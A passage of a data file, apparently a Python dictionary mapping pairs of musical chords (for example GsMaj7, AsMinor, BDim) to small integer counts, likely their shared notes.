'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 3,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 3,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 3,
'E7': 0,
'C7': 2,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 1,
'Ds7': 4,
'GsMaj7': 2,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 3,
'GMinor': 2,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 2,
},
'GsMaj7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 3,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 0,
'CMajor': 2,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 3,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 3,
'DsMajor': 2,
'E7': 1,
'C7': 2,
'GsMinor': 2,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 4,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'AsMinor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 3,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 3,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 2,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 0,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 3,
'BMinor': 0,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 0,
'Csm7': 1,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 1,
},
'BDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 0,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 2,
'G7': 3,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 3,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 2,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 1,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'AsMajor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 2,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 3,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 3,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 1,
},
'AMaj7': {
'AMinor': 2,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 3,
'FsMinor': 2,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 3,
'A7': 3,
'Fm7': 1,
'DsMajor': 0,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 4,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 3,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 3,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 0,
},
'DMajor': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 2,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 0,
'Bm7': 3,
'G7': 1,
'Asm7': 0,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 3,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 3,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'AsDim': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 2,
'B7': 0,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 0,
'G7': 0,
'Asm7': 2,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 3,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 2,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'Fsm7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 3,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 2,
'AMajor': 3,
'A7': 3,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 0,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 2,
'AsDim': 2,
'Fsm7': 4,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 2,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 2,
'FsMajor': 2,
'Am7': 2,
'DsMinor': 1,
},
'Cs7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 3,
'FDim': 3,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 2,
'Bm7': 1,
'G7': 2,
'Asm7': 3,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 4,
'Gm7': 1,
'DDim': 2,
'CsMajor': 3,
'FMinor': 2,
'EMajor': 2,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 3,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 0,
},
'Gm7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 2,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 3,
'Asm7': 2,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 4,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 3,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 3,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'DDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 2,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 2,
'DDim': 3,
'CsMajor': 2,
'FMinor': 2,
'EMajor': 1,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'CsMajor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 3,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 3,
'Gm7': 1,
'DDim': 2,
'CsMajor': 3,
'FMinor': 2,
'EMajor': 1,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 0,
'Csm7': 2,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 0,
},
'FMinor': {
'AMinor': 1,
'CDim': 1,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 2,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 3,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 2,
'FMinor': 3,
'EMajor': 1,
'As7': 2,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'EMajor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 0,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 3,
'C7': 1,
'GsMinor': 2,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 3,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 3,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 3,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'As7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 3,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 3,
'DDim': 3,
'CsMajor': 2,
'FMinor': 2,
'EMajor': 1,
'As7': 4,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 3,
'D7': 1,
'Csm7': 1,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 1,
},
'F7': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 3,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 2,
'FMajor': 3,
'ADim': 3,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 3,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 0,
'As7': 1,
'F7': 4,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'FMaj7': {
'AMinor': 3,
'CDim': 1,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 2,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 2,
'FMajor': 3,
'ADim': 2,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 2,
'DsMajor': 0,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 3,
'FMaj7': 4,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 2,
'D7': 2,
'Csm7': 1,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'FsDim': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 0,
'Asm7': 0,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 2,
'FsDim': 3,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 3,
'Csm7': 0,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 1,
},
'GDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 2,
'E7': 0,
'C7': 2,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 0,
'Ds7': 3,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 3,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'GMinor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 0,
'A7': 1,
'Fm7': 0,
'DsMajor': 2,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 2,
'Asm7': 1,
'BMajor': 0,
